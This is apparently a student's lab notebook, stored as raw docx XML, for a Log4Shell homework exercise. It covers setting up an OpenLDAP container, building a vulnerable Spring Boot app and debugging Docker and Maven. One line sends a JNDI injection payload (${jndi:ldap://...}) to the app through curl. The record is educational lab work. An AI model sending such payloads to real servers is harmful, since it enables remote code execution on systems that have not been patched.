          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -e LDAP_ADMIN_PASSWORD="admin" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE64F2" w14:textId="655447D7" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD5">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920"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  osixia/openldap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05811F4D" w14:textId="35555263" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Tried connecting and see below </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A3C7D" w14:textId="77777777" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD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4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trying 127.0.0.1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F6A8A" w14:textId="77777777" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD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920"/>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Connected to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191823E7" w14:textId="245715E3" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD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920"/>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Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692865E6" w14:textId="5A76A0C3" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00CA0277">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 xml:space="preserve">Now trying to run the script again </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D78A4" w14:textId="1E4545B9" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00CA0277">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ab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Connected to LDAP server at 0.0.0.0:389</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> YYEEAAAAAAAAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C233CBC" w14:textId="0EDDBDD5" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA027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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AEF8CE" w14:textId="064F0DAD" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="009E0422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Run the server in a separate terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DEBCFC" w14:textId="5754F71D" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A"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Opened another terminal</w:t>
      </w:r>
      <w:r w:rsidR="009E0422" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to instance and in the project folder </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D3F7F" w14:textId="7198ECB2" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A"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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ran command but got error </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python ldap_server.py</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-bash: python: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A625C" w14:textId="084D1450" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A"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ab/>
        <w:t xml:space="preserve">Need to use python3 instead – still did not work. Seems like the ldap_server.py </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002977F0" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEARNINGS: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MY MISTAKE – the file is </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python3 ldap_test.py</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and not server. Fixed command and now it works. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F400096" w14:textId="77777777" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A"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p>
    <w:p w14:paraId="710CE942" w14:textId="0A664CC1" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A" w:rsidP="009E0422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Craft and Send payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B5C8FC" w14:textId="15F5CFB6" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A"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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tried </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>curl -X POST http://localhost:8080/log -d</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">but get error </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DCCC91" w14:textId="77777777" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719" w:rsidP="00E71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ab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[ec2-user@ip-172-31-46-85 log4shell-homework]$ curl -X POST http://localhost:8080/log -d '${jndi:ldap://host.docker.internal:389/a}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D43D9" w14:textId="5FA08BA6" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719" w:rsidP="00E71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curl: (7) Failed to connect to localhost port 8080 after 0 ms: Couldn't connect to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14C955" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="00E71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p>
    <w:p w14:paraId="6479164E" w14:textId="76B432FB" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719" w:rsidP="00E71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 xml:space="preserve">tried </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker run -p 8080:8080 your-image-name</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – got output below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABE091" w14:textId="77777777" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719" w:rsidP="00E71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ab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REPOSITORY        TAG       IMAGE ID       CREATED       SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2EDB2" w14:textId="77777777" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719" w:rsidP="00E71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ubuntu            latest    a0e45e2ce6e6   4 weeks ago   78.1MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A76924" w14:textId="4FF5A965" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719" w:rsidP="00E7171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osixia/openldap   latest    31d1d6e16394   4 years ago   257MB</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61619346" w14:textId="17534864" w:rsidR="00790F4A" w:rsidRPr="009F01AC" w:rsidRDefault="00790F4A"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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5F3D5" w14:textId="0A7CAF5A" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719"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0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This means I haven’t </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>haven't built your app Docker image yet</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the one that runs your Java app on port 8080).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65423CD3" w14:textId="2EC89B00" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719"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 xml:space="preserve">Built image </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker build -t log4shell-demo .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B20E91" w14:textId="60EF2E15" w:rsidR="00E71719" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719"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 xml:space="preserve">Checked docker image again – don’t see the additional image </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACC1F1" w14:textId="52C7C8B9" w:rsidR="00652BFC" w:rsidRPr="009F01AC" w:rsidRDefault="00E71719"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Docker build failed – need to rerun it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC42DB" w14:textId="556C4D07" w:rsidR="00652BFC" w:rsidRPr="009F01AC" w:rsidRDefault="00652BFC"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 xml:space="preserve">Reran it no luck still the docker images shows above. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642BEBA" w14:textId="36D3EDFE" w:rsidR="00652BFC" w:rsidRPr="009F01AC" w:rsidRDefault="00652BFC"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Updated docker file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3EA0A6" w14:textId="7B5E0B0D" w:rsidR="00652BFC" w:rsidRPr="009F01AC" w:rsidRDefault="00652BFC"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 xml:space="preserve">Tried again </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CB2BE" w14:textId="61DAF37F" w:rsidR="005117E7" w:rsidRPr="009F01AC" w:rsidRDefault="005117E7"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 xml:space="preserve">Had to modify all the files and also split the LogController.java and Log4ShellDemoApplication.java. Updated code all across. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD07551" w14:textId="27BC400E" w:rsidR="005117E7" w:rsidRPr="009F01AC" w:rsidRDefault="005117E7"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4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Then ran </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mvn clean package</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – and finally it worked!! No errors </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBD703" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422"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p>
    <w:p w14:paraId="144E38F7" w14:textId="140EB17D" w:rsidR="005117E7" w:rsidRPr="009F01AC" w:rsidRDefault="005117E7"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 xml:space="preserve">Now need to run the Spring Boot but I get error </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF79B19" w14:textId="754703B8" w:rsidR="005117E7" w:rsidRPr="009F01AC" w:rsidRDefault="005117E7"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4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40669810" wp14:editId="63DB315D">
            <wp:extent cx="3271157" cy="1027129"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
            <wp:docPr id="22423680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36800" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="3279051" cy="1029608"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3624E713" w14:textId="40C1A0E3" w:rsidR="005117E7" w:rsidRPr="009F01AC" w:rsidRDefault="005117E7"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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F4F07" w14:textId="4B345652" w:rsidR="005117E7" w:rsidRPr="009F01AC" w:rsidRDefault="00BE68C4"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 xml:space="preserve">Spent 2 hours on this – kept going round and round on this – no luck keep getting error again – I don’t know what do – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14878ECB" w14:textId="31E06587" w:rsidR="00BE68C4" w:rsidRPr="009F01AC" w:rsidRDefault="00BE68C4"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 xml:space="preserve">Modified each file numerous times, checked file structure, recreated files, no luck at all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01325764" w14:textId="668FB254" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="002977F0"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00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEARNINGS: </w:t>
      </w:r>
      <w:r w:rsidR="001D4D30" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally I redid the files again and the structure and it worked!!! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981939A" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422"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p>
    <w:p w14:paraId="22717B1B" w14:textId="08A3A870" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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 xml:space="preserve">Now I need to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA6D418" w14:textId="423FBE39" w:rsidR="001D4D30" w:rsidRPr="009F01AC" w:rsidRDefault="001D4D30"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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">use curl to send malicious JNDI payload to the app </w:t>
      </w:r>
    </w:p>
